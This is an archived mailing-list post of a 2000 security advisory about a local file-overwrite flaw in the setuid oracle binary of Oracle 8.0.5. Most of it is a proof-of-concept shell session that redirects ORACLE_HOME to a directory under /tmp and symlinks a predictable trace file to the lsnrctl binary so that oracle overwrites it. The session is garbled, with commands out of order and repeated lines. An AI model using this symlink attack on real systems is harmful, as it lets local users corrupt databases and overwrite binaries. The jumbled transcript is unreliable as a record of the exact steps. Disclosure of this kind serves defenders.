| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in oracle binary in Oracle 8.0.5
Date: 11-12-2000
Platform: Only tested in Linux, but can be "exported" to others.
Impact: Any user compromise any file owned by oracle (DDBB owner).
Author: Juan Manuel Pascual (pask_at_plazasite.com)
Status: Vendor Contacted at 18th July 2001
PROBLEM SUMMARY:
There is a write permision checking error in oracle binary that can
be used by local users to write any file owned by oracle.
IMPACT:
Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.
SOLUTION:
Chmod -s ;-)))).
STATUS:
Vendor was contacted .
Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)
[pask_at_proves1 /tmp]$
[pask_at_proves1 /tmp]$ mkdir rdbms
[pask_at_proves1 /tmp]$ cd rdbms/
[pask_at_proves1 rdbms]$ mkdir log
[pask_at_proves1 rdbms]$ cd log
[pask_at_proves1 log]$
[pask_at_proves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 . drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask_at_proves1 log]$ export ORACLE_HOME=/tmp
[pask_at_proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 . drwxrwxr-x 3 pask pask 4096 dic 14 02:33 .. -rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
Upsssssssss a log owned by oracle with the structure ora_pid.trc
I can create:
[pask_at_proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle .
 |
 |